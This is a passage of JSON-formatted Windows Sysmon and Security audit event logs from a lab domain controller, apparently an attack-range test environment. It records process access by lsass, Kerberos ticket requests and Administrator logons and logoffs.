C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.182","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.182\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.182","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220611,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88067\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x88067","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.198\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.198","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220612,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220613,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220614,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220615,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88087\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x88087","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220616,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88087\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x88087","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.198\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.198","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.198\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 